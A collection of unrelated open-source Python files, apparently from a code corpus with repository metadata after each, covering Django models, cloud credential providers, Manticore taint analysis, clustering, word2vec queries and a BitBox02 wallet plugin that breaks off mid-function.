from ..signals import pre_save_model_attribute
@python_2_unicode_compatible
class area_attribute(models.Model):
"""
Not all parameters are listed here, only those that present some interest
in their Django implementation.
:param area: References :class:`area`
:param area_attribute_type: References :class:`area_attribute_type`
:param area_attribute_type_allowed_value: References :class:`area_attribute_type_allowed_value`.
"""
id = models.AutoField(primary_key=True)
area = models.ForeignKey('area')
area_attribute_type = models.ForeignKey('area_attribute_type')
area_attribute_type_allowed_value = models.ForeignKey('area_attribute_type_allowed_value', null=True)
area_attribute_text = models.TextField(null=True)
def __str__(self):
return 'Area Attribute'
class Meta:
db_table = 'area_attribute'
models.signals.pre_save.connect(pre_save_model_attribute, sender=area_attribute)
|
marios-zindilis/musicbrainz-django-models
|
musicbrainz_django_models/models/area_attribute.py
|
Python
|
gpl-2.0
| 1,946 | 0.004111 |
# -*- coding: utf-8 -*-
import time
import requests
import json
import logging
import threading
from .exceptions import ClientError
from .utils import to_unixtime
from .compat import to_unicode
logger = logging.getLogger(__name__)
class Credentials(object):
def __init__(self, access_key_id="", access_key_secret="", security_token=""):
self.access_key_id = access_key_id
self.access_key_secret = access_key_secret
self.security_token = security_token
def get_access_key_id(self):
return self.access_key_id
def get_access_key_secret(self):
return self.access_key_secret
def get_security_token(self):
return self.security_token
DEFAULT_ECS_SESSION_TOKEN_DURATION_SECONDS = 3600 * 6
DEFAULT_ECS_SESSION_EXPIRED_FACTOR = 0.85
class EcsRamRoleCredential(Credentials):
def __init__(self,
access_key_id,
access_key_secret,
security_token,
expiration,
duration,
expired_factor=None):
self.access_key_id = access_key_id
self.access_key_secret = access_key_secret
self.security_token = security_token
self.expiration = expiration
self.duration = duration
self.expired_factor = expired_factor or DEFAULT_ECS_SESSION_EXPIRED_FACTOR
def get_access_key_id(self):
return self.access_key_id
def get_access_key_secret(self):
return self.access_key_secret
def get_security_token(self):
return self.security_token
def will_soon_expire(self):
now = int(time.time())
return self.duration * (1.0 - self.expired_factor) > self.expiration - now
class CredentialsProvider(object):
def get_credentials(self):
return
class StaticCredentialsProvider(CredentialsProvider):
def __init__(self, access_key_id="", access_key_secret="", security_token=""):
self.credentials = Credentials(access_key_id, access_key_secret, security_token)
def get_credentials(self):
return self.credentials
class EcsRamRoleCredentialsProvider(CredentialsProvider):
def __init__(self, auth_host, max_retries=3, timeout=10):
self.fetcher = EcsRamRoleCredentialsFetcher(auth_host)
self.max_retries = max_retries
self.timeout = timeout
self.credentials = None
self.__lock = threading.Lock()
def get_credentials(self):
if self.credentials is None or self.credentials.will_soon_expire():
with self.__lock:
if self.credentials is None or self.credentials.will_soon_expire():
try:
self.credentials = self.fetcher.fetch(self.max_retries, self.timeout)
except Exception as e:
logger.error("Exception: {0}".format(e))
if self.credentials is None:
raise
return self.credentials
class EcsRamRoleCredentialsFetcher(object):
def __init__(self, auth_host):
self.auth_host = auth_host
def fetch(self, retry_times=3, timeout=10):
for i in range(0, retry_times):
try:
response = requests.get(self.auth_host, timeout=timeout)
if response.status_code != 200:
raise ClientError(
"Failed to fetch credentials url, http code:{0}, msg:{1}".format(response.status_code,
response.text))
dic = json.loads(to_unicode(response.content))
code = dic.get('Code')
access_key_id = dic.get('AccessKeyId')
access_key_secret = dic.get('AccessKeySecret')
security_token = dic.get('SecurityToken')
expiration_date = dic.get('Expiration')
last_updated_date = dic.get('LastUpdated')
if code != "Success":
raise ClientError("Get credentials from ECS metadata service error, code: {0}".format(code))
expiration_stamp = to_unixtime(expiration_date, "%Y-%m-%dT%H:%M:%SZ")
duration = DEFAULT_ECS_SESSION_TOKEN_DURATION_SECONDS
if last_updated_date is not None:
last_updated_stamp = to_unixtime(last_updated_date, "%Y-%m-%dT%H:%M:%SZ")
duration = expiration_stamp - last_updated_stamp
return EcsRamRoleCredential(access_key_id, access_key_secret, security_token, expiration_stamp,
duration, DEFAULT_ECS_SESSION_EXPIRED_FACTOR)
except Exception as e:
if i == retry_times - 1:
logger.error("Exception: {0}".format(e))
raise ClientError("Failed to get credentials from ECS metadata service. {0}".format(e))
|
aliyun/aliyun-oss-python-sdk
|
oss2/credentials.py
|
Python
|
mit
| 4,941 | 0.003036 |
GnuXzPackage ('clutter', '1.10.6',
sources = [ 'http://source.clutter-project.org/sources/clutter/1.10/%{name}-%{version}.tar.xz' ],
)
|
bl8/bockbuild
|
packages/clutter.py
|
Python
|
mit
| 136 | 0.058824 |
#!/usr/bin/env python
import sys
from manticore import issymbolic
from manticore.native import Manticore
"""
Replaces a variable that controls program flow with a tainted symbolic value. This
in turn explores all possible states under that variable's influence, and reports the
specific cmp/test instructions can be influenced by tainted data.
Usage:
$ gcc -static -g src/state_explore.c -o state_explore # -static is optional
$ ADDRESS=0x$(objdump -S state_explore | grep -A 1 '((value & 0xff) != 0)' |
tail -n 1 | sed 's|^\s*||g' | cut -f1 -d:)
$ python ./introduce_symbolic_bytes.py state_explore $ADDRESS
Tainted Control Flow:
introducing symbolic value to 7ffffffffd44
400a0e: test eax, eax
400a19: cmp eax, 0x3f
400b17: test eax, eax
400b1e: cmp eax, 0x1000
400b63: test eax, eax
400a3e: cmp eax, 0x41
400a64: cmp eax, 0x42
400a8a: cmp eax, 0x43
400ab0: cmp eax, 0x44
400b6a: cmp eax, 0xf0000
Analysis finished. See ./mcore_cz3Jzp for results.
"""
if __name__ == "__main__":
if len(sys.argv) < 3:
sys.stderr.write(f"Usage: {sys.argv[0]} [binary] [address]\n")
sys.exit(2)
# Passing a parameter to state_explore binary disables reading the value
# from STDIN, and relies on us adding it manually
m = Manticore(sys.argv[1], ["anything"])
# Uncomment to see debug output
# m.verbosity = 2
# Set to the address of the instruction before the first conditional.
introduce_at = int(sys.argv[2], 0)
taint_id = "taint_A"
@m.hook(introduce_at)
def introduce_sym(state):
# RBP-0xC is the location of the value we're interested in:
#
# if ((value & 0xff) != 0) {
# 400a08: 8b 45 f4 mov -0xc(%rbp),%eax
# 400a0b: 0f b6 c0 movzbl %al,%eax
# 400a0e: 85 c0 test %eax,%eax
#
print(f"introducing symbolic value to {state.cpu.RBP-0xc:x}")
val = state.new_symbolic_value(32, taint=(taint_id,))
state.cpu.write_int(state.cpu.RBP - 0xC, val, 32)
def has_tainted_operands(operands, taint_id):
# type: (list[manticore.core.cpu.abstractcpu.Operand], object) -> bool
for operand in operands:
op = operand.read()
if issymbolic(op) and taint_id in op.taint:
return True
return False
every_instruction = None
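    # A hook address of None registers the callback for every executed instruction.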
@m.hook(every_instruction)
def check_taint(state):
insn = state.cpu.instruction # type: capstone.CsInsn
if insn is None:
return
if insn.mnemonic in ("cmp", "test"):
if has_tainted_operands(insn.operands, taint_id):
print(f"{insn.address:x}: {insn.mnemonic} {insn.op_str}")
print("Tainted Control Flow:")
m.run()
print(f"Analysis finished. See {m.workspace} for results.")
|
montyly/manticore
|
examples/script/introduce_symbolic_bytes.py
|
Python
|
apache-2.0
| 2,875 | 0.001043 |
# Fabric file for the health monitor.
#
# This should only be used for deployment tasks. make should be
# sufficient for development.
import os
from fabric.api import env, task, roles, lcd, local, run, put
BASE_DIR = os.path.dirname(__file__)
env.path = ":".join([
'/home/forcer/bin/',
os.path.join(BASE_DIR, "node_modules/.bin/")
])
env.roledefs = {
'production': ['healthmonitor@loki']
}
@task
@roles('production')
def deploy():
run("test -d venv || pyvenv-3.4 venv")
run("test -f venv/lib/python3.4/site-packages/_healthmonitor.pth || "
"echo $HOME/lib > venv/lib/python3.4/site-packages/_healthmonitor.pth")
run("mkdir -p health.jorgenschaefer.de/static/")
run("mkdir -p lib/")
local("git archive -o deploy.tar.gz HEAD")
put("deploy.tar.gz")
local("rm deploy.tar.gz")
run("tar -C lib/ -xzf deploy.tar.gz")
run("rm deploy.tar.gz")
local("bower install --production")
local("tar -c bower_components/ "
"-zf bower_components.tar.gz")
put("bower_components.tar.gz")
local("rm bower_components.tar.gz")
run("tar -C lib -xzf bower_components.tar.gz")
run("rm bower_components.tar.gz")
local("make compress")
local("tar -C static -c CACHE -zf compressed_cache.tar.gz")
put("compressed_cache.tar.gz")
local("rm compressed_cache.tar.gz")
run("tar -C health.jorgenschaefer.de/static/ -xzf compressed_cache.tar.gz")
run("rm compressed_cache.tar.gz")
run("venv/bin/pip install -qr lib/requirements.txt")
run("venv/bin/django-admin migrate --noinput "
"--settings=healthmonitor.settings_production")
run("venv/bin/django-admin collectstatic --noinput "
"--settings=healthmonitor.settings_production")
run("sudo /usr/bin/supervisorctl restart healthmonitor")
|
jorgenschaefer/healthmonitor
|
fabfile.py
|
Python
|
agpl-3.0
| 1,805 | 0 |
# This file is part of PyEMMA.
#
# Copyright (c) 2015, 2014 Computational Molecular Biology Group, Freie Universitaet Berlin (GER)
#
# PyEMMA is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
Created on 26.01.2015
@author: marscher
'''
import warnings
from pyemma.coordinates.clustering.interface import AbstractClustering
from pyemma.util.annotators import fix_docs
from pyemma.util.exceptions import NotConvergedWarning
import numpy as np
__all__ = ['RegularSpaceClustering']
@fix_docs
class RegularSpaceClustering(AbstractClustering):
r"""Regular space clustering"""
__serialize_version = 0
def __init__(self, dmin, max_centers=1000, metric='euclidean', stride=1, n_jobs=None, skip=0):
"""Clusters data objects in such a way, that cluster centers are at least in
distance of dmin to each other according to the given metric.
The assignment of data objects to cluster centers is performed by
Voronoi partioning.
Regular space clustering [Prinz_2011]_ is very similar to Hartigan's leader
algorithm [Hartigan_1975]_. It consists of two passes through
the data. Initially, the first data point is added to the list of centers.
For every subsequent data point, if it has a greater distance than dmin from
every center, it also becomes a center. In the second pass, a Voronoi
discretization with the computed centers is used to partition the data.
Parameters
----------
dmin : float
minimum distance between all clusters.
metric : str
metric to use during clustering ('euclidean', 'minRMSD')
max_centers : int
if this cutoff is hit during finding the centers,
the algorithm will abort.
n_jobs : int or None, default None
Number of threads to use during assignment of the data.
If None, all available CPUs will be used.
References
----------
.. [Prinz_2011] Prinz J-H, Wu H, Sarich M, Keller B, Senne M, Held M, Chodera JD, Schuette Ch and Noe F. 2011.
Markov models of molecular kinetics: Generation and Validation.
J. Chem. Phys. 134, 174105.
.. [Hartigan_1975] Hartigan J. Clustering algorithms.
New York: Wiley; 1975.
"""
super(RegularSpaceClustering, self).__init__(metric=metric, n_jobs=n_jobs)
self._converged = False
self.set_params(dmin=dmin, metric=metric,
max_centers=max_centers, stride=stride, skip=skip)
def describe(self):
return "[RegularSpaceClustering dmin=%f, inp_dim=%i]" % (self._dmin, self.data_producer.dimension())
@property
def dmin(self):
"""Minimum distance between cluster centers."""
return self._dmin
@dmin.setter
def dmin(self, d):
d = float(d)
if d < 0:
raise ValueError("d has to be positive")
self._dmin = d
@property
def max_centers(self):
"""
Cutoff during clustering. If reached no more data is taken into account.
You might then consider a larger value or a larger dmin value.
"""
return self._max_centers
@max_centers.setter
def max_centers(self, value):
value = int(value)
if value < 0:
raise ValueError("max_centers has to be positive")
self._max_centers = value
@property
def n_clusters(self):
return self.max_centers
@n_clusters.setter
def n_clusters(self, val):
self.max_centers = val
def _estimate(self, iterable, **kwargs):
########
# Calculate clustercenters:
# 1. choose first datapoint as centroid
# 2. for all X: calc distances to all clustercenters
# 3. add new centroid, if min(distance to all other clustercenters) >= dmin
########
# temporary list to store cluster centers
clustercenters = []
used_frames = 0
from ._ext import regspace
self._inst = regspace.Regspace_f(self.dmin, self.max_centers, self.metric, iterable.ndim)
it = iterable.iterator(return_trajindex=False, stride=self.stride,
chunk=self.chunksize, skip=self.skip)
try:
with it:
for X in it:
used_frames += len(X)
self._inst.cluster(X.astype(np.float32, order='C', copy=False),
clustercenters, self.n_jobs)
self._converged = True
except regspace.MaxCentersReachedException:
self._converged = False
msg = 'Maximum number of cluster centers reached.' \
' Consider increasing max_centers or choose' \
' a larger minimum distance, dmin.'
self.logger.warning(msg)
warnings.warn(msg)
# pass amount of processed data
used_data = used_frames / float(it.n_frames_total()) * 100.0
raise NotConvergedWarning("Used data for centers: %.2f%%" % used_data)
finally:
# even if not converged, we store the found centers.
new_shape = (len(clustercenters), iterable.ndim)
clustercenters = np.array(clustercenters).reshape(new_shape)
self.update_model_params(clustercenters=clustercenters,
n_clusters=len(clustercenters))
if len(clustercenters) == 1:
self.logger.warning('Have found only one center according to '
'minimum distance requirement of %f' % self.dmin)
return self
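# Minimal usage sketch (synthetic data; the high-level wrapper below is the
# public pyemma.coordinates API, shown here only for illustration):
#   import numpy as np
#   import pyemma.coordinates as coor
#   X = np.random.rand(1000, 2).astype(np.float32)
#   clustering = coor.cluster_regspace(X, dmin=0.3)
#   print(clustering.clustercenters.shape)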
|
fabian-paul/PyEMMA
|
pyemma/coordinates/clustering/regspace.py
|
Python
|
lgpl-3.0
| 6,283 | 0.002547 |
# -*- coding: utf-8 -*-
"""
Created on Tue Jan 12 11:57:45 2016
@author: katerinailiakopoulou
"""
import gensim
import logging
import sys
logging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.INFO)
"""
The Finder finds which words are similar to the one given
based on the word2vec word vectors. It also prints how similar two
words are depending on their word vectors comparison.
"""
class Finder(object):
def __init__(self,model,output,topn):
self.output_file = open(output,'w')
self.m = gensim.models.Word2Vec.load(model)
print(len(self.m.index2word))
self.n = topn
def get_most_similar(self,input):
self.output_file.write('---Similar words to:' + input + '---\n')
try:
self.output_file.write(str(self.m.most_similar([input], topn=self.n)))
except KeyError as e:
self.output_file.write(str(e))
self.output_file.write('\n')
def get_pos_negs_similar(self,input):
self.output_file.write('--- Similar words to: ' + input + '---\n')
pos_negs = input.split('NOT')
pos = pos_negs[0]
neg = pos_negs[1]
poss = pos.split('AND')
negs = neg.split(',')
positives = []
for p in poss:
positives.append(p.strip())
negatives = []
for n in negs:
negatives.append(n.strip())
try:
self.output_file.write(str(self.m.most_similar(positive=positives, negative=negatives, topn=self.n)))
except KeyError as e:
self.output_file.write(str(e))
self.output_file.write('\n')
def get_pos_similar(self,input):
self.output_file.write('--- Similar words to: ' + input + '---\n')
poss = input.split('AND')
positives = []
for p in poss:
positives.append(p.strip())
try:
self.output_file.write(str(self.m.most_similar(positive=positives, topn=self.n)))
except KeyError as e:
self.output_file.write(str(e))
self.output_file.write('\n')
def get_similarity(self,input):
self.output_file.write('--- Similarity between: ' + input + '---\n')
parts = input.split('-')
try:
self.output_file.write(str(self.m.similarity(parts[0], parts[1])))
except KeyError as e:
self.output_file.write(str(e))
self.output_file.write('\n')
def process_input(self,input):
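        # Each line of the input file is one query; illustrative forms:
        #   king                      -> most similar words to "king"
        #   king AND queen            -> words similar to the combined terms
        #   king AND woman NOT man    -> positive/negative analogy query
        #   king-queen                -> similarity score between the two words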
f = open(input, 'r+')
for line in f:
word = line.replace("\n", "")
            if 'NOT' in line:  # analogy query, e.g. "a AND b NOT c"
self.get_pos_negs_similar(word)
elif 'AND' in line:
self.get_pos_similar(word)
elif '-' in line:
self.get_similarity(word)
else:
self.get_most_similar(word)
if __name__ == "__main__":
if len(sys.argv) < 5:
        sys.exit('Please provide [word2vec model] [input file] [output file] [similar word count]: [--s --s --s --int]')
Finder(sys.argv[1],sys.argv[3],int(sys.argv[4])).process_input(sys.argv[2])
|
matzika/article-tagger-system
|
words_similarity_detector.py
|
Python
|
gpl-2.0
| 3,189 | 0.007839 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
###############################################################################
# Copyright Kitware Inc.
#
# Licensed under the Apache License, Version 2.0 ( the "License" );
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
###############################################################################
import datetime
import hashlib
from girder import events
from girder.api import access
from girder.api.describe import Description, autoDescribeRoute
from girder.api.rest import boundHandler, RestException
from girder.api.v1.collection import Collection
from girder.constants import AccessType, TokenScope
from girder.models.model_base import ModelImporter
@access.user(scope=TokenScope.DATA_READ)
@boundHandler
@autoDescribeRoute(
Description('Accept a collection\'s Terms of Use for the current user.')
.modelParam('id', model='collection', level=AccessType.READ)
.param('termsHash', 'The SHA-256 hash of this collection\'s terms, encoded in hexadecimal.')
)
def acceptCollectionTerms(self, collection, termsHash):
if not collection.get('terms'):
raise RestException('This collection currently has no terms.')
# termsHash should be encoded to a bytes object, but storing bytes into MongoDB behaves
# differently in Python 2 vs 3. Additionally, serializing a bytes to JSON behaves differently
# in Python 2 vs 3. So, just keep it as a unicode (or ordinary Python 2 str).
realTermsHash = hashlib.sha256(collection['terms'].encode('utf-8')).hexdigest()
if termsHash != realTermsHash:
# This "proves" that the client has at least accessed the terms
raise RestException(
'The submitted "termsHash" does not correspond to the collection\'s current terms.')
ModelImporter.model('user').update(
{'_id': self.getCurrentUser()['_id']},
{'$set': {
'terms.collection.%s' % collection['_id']: {
'hash': termsHash,
'accepted': datetime.datetime.now()
}
}}
)
def afterPostPutCollection(event):
# This will only trigger if no exceptions (for access, invalid id, etc.) are thrown
extraParams = event.info['params']
if 'terms' in extraParams:
collectionResponse = event.info['returnVal']
collectionId = collectionResponse['_id']
terms = extraParams['terms']
ModelImporter.model('collection').update(
{'_id': collectionId},
{'$set': {'terms': terms}}
)
collectionResponse['terms'] = terms
event.addResponse(collectionResponse)
def load(info):
# Augment the collection creation and edit routes to accept a terms field
events.bind('rest.post.collection.after', 'terms', afterPostPutCollection)
events.bind('rest.put.collection/:id.after', 'terms', afterPostPutCollection)
for handler in [
Collection.createCollection,
Collection.updateCollection
]:
handler.description.param('terms', 'The Terms of Use for the collection.', required=False)
# Expose the terms field on all collections
ModelImporter.model('collection').exposeFields(level=AccessType.READ, fields={'terms'})
# Add endpoint for registered users to accept terms
info['apiRoot'].collection.route('POST', (':id', 'acceptTerms'), acceptCollectionTerms)
# Expose the terms field on all users
ModelImporter.model('user').exposeFields(level=AccessType.ADMIN, fields={'terms'})
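# Hypothetical client-side sketch (collection id, terms text and token are
# placeholders): accept a collection's terms via the endpoint added above.
#   import hashlib, requests
#   terms_hash = hashlib.sha256(terms_text.encode('utf-8')).hexdigest()
#   requests.post(api_root + '/collection/' + collection_id + '/acceptTerms',
#                 params={'termsHash': terms_hash},
#                 headers={'Girder-Token': token})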
|
adsorensen/girder
|
plugins/terms/server/__init__.py
|
Python
|
apache-2.0
| 3,937 | 0.003048 |
# -*- coding: utf-8 -*-
from pyload.plugin.internal.SimpleDereferer import SimpleDereferer
class Dereferer(SimpleDereferer):
__name = "Dereferer"
__type = "crypter"
__version = "0.11"
__pattern = r'https?://([^/]+)/.*?(?P<LINK>(ht|f)tps?(://|%3A%2F%2F).+)'
__config = [("use_subfolder" , "bool", "Save package to subfolder" , True),
("subfolder_per_pack", "bool", "Create a subfolder for each package", True)]
__description = """Crypter for dereferers"""
__license = "GPLv3"
__authors = [("zoidberg", "zoidberg@mujmail.cz")]
|
ardi69/pyload-0.4.10
|
pyload/plugin/crypter/Dereferer.py
|
Python
|
gpl-3.0
| 584 | 0.017123 |
#!/usr/bin/env vpython
# Copyright 2019 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import os
import subprocess
import sys
import unittest
import mock
import merge_lib as merger
class MergeLibTest(unittest.TestCase):
# pylint: disable=super-with-arguments
def __init__(self, *args, **kwargs):
super(MergeLibTest, self).__init__(*args, **kwargs)
self.maxDiff = None
# pylint: enable=super-with-arguments
@mock.patch.object(subprocess, 'check_output')
def test_validate_and_convert_profraw(self, mock_cmd):
test_cases = [
([''], [['mock.profdata'], [], []]),
(['Counter overflow'], [[], ['mock.profraw'], ['mock.profraw']]),
(subprocess.CalledProcessError(
255,
'llvm-cov merge -o mock.profdata -sparse=true mock.profraw',
output='Malformed profile'), [[], ['mock.profraw'], []]),
]
for side_effect, expected_results in test_cases:
mock_cmd.side_effect = side_effect
output_profdata_files = []
invalid_profraw_files = []
counter_overflows = []
merger._validate_and_convert_profraw(
'mock.profraw', output_profdata_files, invalid_profraw_files,
counter_overflows, '/usr/bin/llvm-cov')
self.assertEqual(
expected_results,
[output_profdata_files, invalid_profraw_files, counter_overflows])
if __name__ == '__main__':
unittest.main()
|
chromium/chromium
|
testing/merge_scripts/code_coverage/merge_lib_test.py
|
Python
|
bsd-3-clause
| 1,506 | 0.007968 |
#
# BitBox02 Electrum plugin code.
#
import hid
from typing import TYPE_CHECKING, Dict, Tuple, Optional, List, Any, Callable
from electrum_grs import bip32, constants
from electrum_grs.i18n import _
from electrum_grs.keystore import Hardware_KeyStore
from electrum_grs.transaction import PartialTransaction
from electrum_grs.wallet import Standard_Wallet, Multisig_Wallet, Deterministic_Wallet
from electrum_grs.util import bh2u, UserFacingException
from electrum_grs.base_wizard import ScriptTypeNotSupported, BaseWizard
from electrum_grs.logging import get_logger
from electrum_grs.plugin import Device, DeviceInfo, runs_in_hwd_thread
from electrum_grs.simple_config import SimpleConfig
from electrum_grs.json_db import StoredDict
from electrum_grs.storage import get_derivation_used_for_hw_device_encryption
from electrum_grs.bitcoin import OnchainOutputType
import electrum_grs.bitcoin as bitcoin
import electrum_grs.ecc as ecc
from ..hw_wallet import HW_PluginBase, HardwareClientBase
_logger = get_logger(__name__)
try:
from bitbox02 import bitbox02
from bitbox02 import util
from bitbox02.communication import (
devices,
HARDENED,
u2fhid,
bitbox_api_protocol,
FirmwareVersionOutdatedException,
)
requirements_ok = True
except ImportError as e:
if not (isinstance(e, ModuleNotFoundError) and e.name == 'bitbox02'):
_logger.exception('error importing bitbox02 plugin deps')
requirements_ok = False
class BitBox02Client(HardwareClientBase):
# handler is a BitBox02_Handler, importing it would lead to a circular dependency
def __init__(self, handler: Any, device: Device, config: SimpleConfig, *, plugin: HW_PluginBase):
HardwareClientBase.__init__(self, plugin=plugin)
self.bitbox02_device = None # type: Optional[bitbox02.BitBox02]
self.handler = handler
self.device_descriptor = device
self.config = config
self.bitbox_hid_info = None
if self.config.get("bitbox02") is None:
bitbox02_config: dict = {
"remote_static_noise_keys": [],
"noise_privkey": None,
}
self.config.set_key("bitbox02", bitbox02_config)
bitboxes = devices.get_any_bitbox02s()
for bitbox in bitboxes:
if (
bitbox["path"] == self.device_descriptor.path
and bitbox["interface_number"]
== self.device_descriptor.interface_number
):
self.bitbox_hid_info = bitbox
if self.bitbox_hid_info is None:
raise Exception("No BitBox02 detected")
def is_initialized(self) -> bool:
return True
@runs_in_hwd_thread
def close(self):
try:
self.bitbox02_device.close()
except:
pass
def has_usable_connection_with_device(self) -> bool:
if self.bitbox_hid_info is None:
return False
return True
@runs_in_hwd_thread
def get_soft_device_id(self) -> Optional[str]:
if self.handler is None:
# Can't do the pairing without the handler. This happens at wallet creation time, when
# listing the devices.
return None
if self.bitbox02_device is None:
self.pairing_dialog()
return self.bitbox02_device.root_fingerprint().hex()
@runs_in_hwd_thread
def pairing_dialog(self):
def pairing_step(code: str, device_response: Callable[[], bool]) -> bool:
msg = "Please compare and confirm the pairing code on your BitBox02:\n" + code
self.handler.show_message(msg)
try:
res = device_response()
except:
# Close the hid device on exception
hid_device.close()
raise
finally:
self.handler.finished()
return res
def exists_remote_static_pubkey(pubkey: bytes) -> bool:
bitbox02_config = self.config.get("bitbox02")
noise_keys = bitbox02_config.get("remote_static_noise_keys")
if noise_keys is not None:
if pubkey.hex() in [noise_key for noise_key in noise_keys]:
return True
return False
def set_remote_static_pubkey(pubkey: bytes) -> None:
if not exists_remote_static_pubkey(pubkey):
bitbox02_config = self.config.get("bitbox02")
if bitbox02_config.get("remote_static_noise_keys") is not None:
bitbox02_config["remote_static_noise_keys"].append(pubkey.hex())
else:
bitbox02_config["remote_static_noise_keys"] = [pubkey.hex()]
self.config.set_key("bitbox02", bitbox02_config)
def get_noise_privkey() -> Optional[bytes]:
bitbox02_config = self.config.get("bitbox02")
privkey = bitbox02_config.get("noise_privkey")
if privkey is not None:
return bytes.fromhex(privkey)
return None
def set_noise_privkey(privkey: bytes) -> None:
bitbox02_config = self.config.get("bitbox02")
bitbox02_config["noise_privkey"] = privkey.hex()
self.config.set_key("bitbox02", bitbox02_config)
def attestation_warning() -> None:
self.handler.show_error(
"The BitBox02 attestation failed.\nTry reconnecting the BitBox02.\nWarning: The device might not be genuine, if the\n problem persists please contact Shift support.",
blocking=True
)
class NoiseConfig(bitbox_api_protocol.BitBoxNoiseConfig):
"""NoiseConfig extends BitBoxNoiseConfig"""
def show_pairing(self, code: str, device_response: Callable[[], bool]) -> bool:
return pairing_step(code, device_response)
def attestation_check(self, result: bool) -> None:
if not result:
attestation_warning()
def contains_device_static_pubkey(self, pubkey: bytes) -> bool:
return exists_remote_static_pubkey(pubkey)
def add_device_static_pubkey(self, pubkey: bytes) -> None:
return set_remote_static_pubkey(pubkey)
def get_app_static_privkey(self) -> Optional[bytes]:
return get_noise_privkey()
def set_app_static_privkey(self, privkey: bytes) -> None:
return set_noise_privkey(privkey)
if self.bitbox02_device is None:
hid_device = hid.device()
hid_device.open_path(self.bitbox_hid_info["path"])
bitbox02_device = bitbox02.BitBox02(
transport=u2fhid.U2FHid(hid_device),
device_info=self.bitbox_hid_info,
noise_config=NoiseConfig(),
)
try:
bitbox02_device.check_min_version()
except FirmwareVersionOutdatedException:
raise
self.bitbox02_device = bitbox02_device
self.fail_if_not_initialized()
def fail_if_not_initialized(self) -> None:
assert self.bitbox02_device
if not self.bitbox02_device.device_info()["initialized"]:
raise Exception(
"Please initialize the BitBox02 using the BitBox app first before using the BitBox02 in electrum"
)
def coin_network_from_electrum_network(self) -> int:
if constants.net.TESTNET:
return bitbox02.btc.TBTC
return bitbox02.btc.BTC
@runs_in_hwd_thread
def get_password_for_storage_encryption(self) -> str:
derivation = get_derivation_used_for_hw_device_encryption()
derivation_list = bip32.convert_bip32_path_to_list_of_uint32(derivation)
xpub = self.bitbox02_device.electrum_encryption_key(derivation_list)
node = bip32.BIP32Node.from_xkey(xpub, net = constants.BitcoinMainnet()).subkey_at_public_derivation(())
return node.eckey.get_public_key_bytes(compressed=True).hex()
@runs_in_hwd_thread
def get_xpub(self, bip32_path: str, xtype: str, *, display: bool = False) -> str:
if self.bitbox02_device is None:
self.pairing_dialog()
if self.bitbox02_device is None:
raise Exception(
"Need to setup communication first before attempting any BitBox02 calls"
)
self.fail_if_not_initialized()
xpub_keypath = bip32.convert_bip32_path_to_list_of_uint32(bip32_path)
coin_network = self.coin_network_from_electrum_network()
if xtype == "p2wpkh":
if coin_network == bitbox02.btc.BTC:
out_type = bitbox02.btc.BTCPubRequest.ZPUB
else:
out_type = bitbox02.btc.BTCPubRequest.VPUB
elif xtype == "p2wpkh-p2sh":
if coin_network == bitbox02.btc.BTC:
out_type = bitbox02.btc.BTCPubRequest.YPUB
else:
out_type = bitbox02.btc.BTCPubRequest.UPUB
elif xtype == "p2wsh-p2sh":
if coin_network == bitbox02.btc.BTC:
out_type = bitbox02.btc.BTCPubRequest.CAPITAL_YPUB
else:
out_type = bitbox02.btc.BTCPubRequest.CAPITAL_UPUB
elif xtype == "p2wsh":
if coin_network == bitbox02.btc.BTC:
out_type = bitbox02.btc.BTCPubRequest.CAPITAL_ZPUB
else:
out_type = bitbox02.btc.BTCPubRequest.CAPITAL_VPUB
# The other legacy types are not supported
else:
raise Exception("invalid xtype:{}".format(xtype))
return self.bitbox02_device.btc_xpub(
keypath=xpub_keypath,
xpub_type=out_type,
coin=coin_network,
display=display,
)
@runs_in_hwd_thread
def label(self) -> str:
if self.handler is None:
# Can't do the pairing without the handler. This happens at wallet creation time, when
# listing the devices.
return super().label()
if self.bitbox02_device is None:
self.pairing_dialog()
# We add the fingerprint to the label, as if there are two devices with the same label, the
# device manager can mistake one for another and fail.
return "%s (%s)" % (
self.bitbox02_device.device_info()["name"],
self.bitbox02_device.root_fingerprint().hex(),
)
@runs_in_hwd_thread
def request_root_fingerprint_from_device(self) -> str:
if self.bitbox02_device is None:
raise Exception(
"Need to setup communication first before attempting any BitBox02 calls"
)
return self.bitbox02_device.root_fingerprint().hex()
def is_pairable(self) -> bool:
if self.bitbox_hid_info is None:
return False
return True
@runs_in_hwd_thread
def btc_multisig_config(
self, coin, bip32_path: List[int], wallet: Multisig_Wallet, xtype: str,
):
"""
Set and get a multisig config with the current device and some other arbitrary xpubs.
Registers it on the device if not already registered.
xtype: 'p2wsh' | 'p2wsh-p2sh'
"""
assert xtype in ("p2wsh", "p2wsh-p2sh")
if self.bitbox02_device is None:
raise Exception(
"Need to setup communication first before attempting any BitBox02 calls"
)
account_keypath = bip32_path[:-2]
xpubs = wallet.get_master_public_keys()
our_xpub = self.get_xpub(
bip32.convert_bip32_intpath_to_strpath(account_keypath), xtype
)
multisig_config = bitbox02.btc.BTCScriptConfig(
multisig=bitbox02.btc.BTCScriptConfig.Multisig(
threshold=wallet.m,
xpubs=[util.parse_xpub(xpub) for xpub in xpubs],
our_xpub_index=xpubs.index(our_xpub),
script_type={
"p2wsh": bitbox02.btc.BTCScriptConfig.Multisig.P2WSH,
"p2wsh-p2sh": bitbox02.btc.BTCScriptConfig.Multisig.P2WSH_P2SH,
}[xtype]
)
)
is_registered = self.bitbox02_device.btc_is_script_config_registered(
coin, multisig_config, account_keypath
)
if not is_registered:
name = self.handler.name_multisig_account()
try:
self.bitbox02_device.btc_register_script_config(
coin=coin,
script_config=multisig_config,
keypath=account_keypath,
name=name,
)
